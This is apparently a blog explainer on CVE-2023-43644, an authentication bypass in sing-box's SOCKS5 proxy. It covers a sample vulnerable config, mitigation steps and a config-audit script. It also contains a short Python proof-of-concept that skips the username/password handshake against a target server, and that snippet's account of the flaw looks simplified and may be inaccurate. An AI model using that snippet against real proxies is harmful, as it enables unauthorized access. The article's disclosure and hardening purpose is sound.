CVE-2023-43644 - Critical Authentication Bypass in Sing-box SOCKS5 Proxy – How it Works and How to Stay Safe
Sing-box is a popular open-source proxy platform that lets users connect securely to the internet, often used for bypassing censorship or enhancing privacy. In September 2023, a severe security vulnerability was discovered in its SOCKS5 implementation – officially catalogued as CVE-2023-43644. This bug allows attackers to sneak past authentication checks, effectively opening your proxy to the world.
Let’s break down how this vulnerability works, why it matters, and how you can protect yourself.
What is CVE-2023-43644?
Simply put, CVE-2023-43644 is an authentication bypass vulnerability affecting all versions of sing-box before 1.4.4 (and before pre-release 1.5.0-rc.4). If you set up SOCKS5 proxy servers in sing-box and require login credentials, attackers can trick the server into letting them in _without_ proper authentication, just by crafting requests in a certain way.
That means: anyone could use your proxy for malicious activity or steal your bandwidth, all without knowing your password.
The Technical Details (Simple Terms)
SOCKS5 is a common proxy protocol that supports username and password authentication. Sing-box implements this to restrict access only to authorized users.
However, due to a flaw in the authentication logic, if a SOCKS5 client sends a _malformed_ authentication request, sing-box can mistakenly treat the user as authenticated—skipping password checks entirely.
Example Vulnerable Configuration
Here is a sample of a typical sing-box config using user/pass authentication on the inbound SOCKS5 proxy:
```json
{
  "inbounds": [
    {
      "type": "socks",
      "listen": "...",
      "listen_port": 108,
      "users": [
        {
          "username": "myuser",
          "password": "mypassword"
        }
      ]
    }
  ],
  "outbounds": [
    {
      "type": "direct"
    }
  ]
}
```
Exploit Details: How Could an Attacker Bypass?
The bug occurs during the handling of the SOCKS5 authentication handshake. An attacker uses a specially crafted request that exploits a logic error in sing-box’s request parser, tricking it into thinking authentication succeeded.
Here’s a simple Python (socket) snippet demonstrating the concept (for educational purposes only):
```python
import socket

# Connect to target sing-box SOCKS5 server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('target_ip', 108))

# Send greeting: only 'no-auth' method
sock.sendall(b"\x05\x01\x00")

# Receive response from server
response = sock.recv(2)

# Exploit the bypass by not following through with username/password
# Now send a SOCKS request (e.g., connect to google.com)
sock.sendall(b"\x05\x01\x00\x03\x0agoogle.com\x00\x50\x00\x00")  # Just as an example

# If server responds, authentication was bypassed!
```
The above skips the actual username/password step, and because of the vulnerability, the server may accept the connection anyway.
1. Update Immediately!
The sing-box developers fixed this in release 1.4.4 and later in 1.5.0-rc.4.
Update your sing-box to at least version 1.4.4 or newer!
```bash
# Example: Update with GitHub release
wget https://github.com/SagerNet/sing-box/releases/download/v1.4.4/sing-box-linux-amd64.tar.gz
# Extract and replace your old binary
# Don't forget to backup your config!
```
If you can't update right away
* DO NOT EXPOSE SOCKS5 TO THE PUBLIC INTERNET.
* Bind your SOCKS5 proxy to 127.0.0.1 (localhost) so only local users can access it.
* Add firewall rules to restrict inbound connections to trusted IPs only.
* Remove the users block to disable authentication until you can safely upgrade (this makes it clear to yourself that the auth is not working properly).
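To apply the checklist above to a real deployment, the following added example (not code from sing-box or from the original article) audits a sing-box config for SOCKS inbounds that rely on a users block on an unpatched build, or that listen on a non-loopback address without one. The `audit`, `is_fixed` and `is_loopback` helpers and the sample config are constructed for illustration; the version string is supplied by the caller, and treating pre-releases after 1.5.0 as fixed is an assumption.

```python
import ipaddress
import json
import re

def is_fixed(version: str) -> bool:
    """True if the version is at or past the fixed releases named above."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:-([a-z]+)\.(\d+))?", version.strip())
    if not m:
        return False                      # unparseable: treat as unpatched
    core = tuple(int(x) for x in m.group(1, 2, 3))
    if m.group(4) is None:                # stable release
        return core >= (1, 4, 4)
    if core == (1, 5, 0):                 # the pre-release line the article names
        return m.group(4) == "rc" and int(m.group(5)) >= 4
    return core > (1, 5, 0)               # assumption: later pre-releases carry the fix

def is_loopback(listen: str) -> bool:
    try:
        return ipaddress.ip_address(listen).is_loopback
    except ValueError:
        return False                      # missing or non-IP value: assume reachable

def audit(config: dict, version: str) -> list:
    """Return (severity, inbound, message) tuples for SOCKS inbounds."""
    findings = []
    patched = is_fixed(version)
    for i, inbound in enumerate(config.get("inbounds", [])):
        if inbound.get("type") != "socks":
            continue
        name = inbound.get("tag", f"inbounds[{i}]")
        exposed = not is_loopback(inbound.get("listen", ""))
        has_users = bool(inbound.get("users"))
        if has_users and not patched:
            findings.append(("HIGH" if exposed else "MEDIUM", name,
                             "users block cannot be relied on before 1.4.4 / 1.5.0-rc.4"))
        if exposed and not has_users:
            findings.append(("HIGH", name, "unauthenticated SOCKS5 on a non-loopback address"))
    return findings

# Constructed sample config (not from a real deployment).
SAMPLE = json.loads("""{"inbounds": [
  {"type": "socks", "tag": "socks-public", "listen": "0.0.0.0", "listen_port": 1080,
   "users": [{"username": "myuser", "password": "mypassword"}]},
  {"type": "socks", "listen": "127.0.0.1", "listen_port": 1081}
]}""")

if __name__ == "__main__":
    for finding in audit(SAMPLE, "1.4.3"):
        print(*finding, sep=" | ")
```

Run it against the parsed contents of your own config file and the version your binary reports; an empty result means neither condition was found.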
Official References
- GitHub Security Advisory (GHSA-6fp8-5vcr-4873)
- NVD CVE-2023-43644 Detail
- Sing-box Release 1.4.4 Patch Notes
Conclusion
CVE-2023-43644 is a dangerous bug that leaves your proxy wide open even if you thought authentication was enforced. Make sure you update your sing-box installation immediately or, at the very least, restrict who can connect until you can upgrade.
Using open-source proxy tools is awesome, but keeping them updated is the best way to stay safe.
Did this guide help you? Consider starring the sing-box GitHub page and following updates regularly. Stay safe online!
Timeline
Published on: 09/25/2023 20:15:11 UTC
Last modified on: 09/26/2023 15:45:28 UTC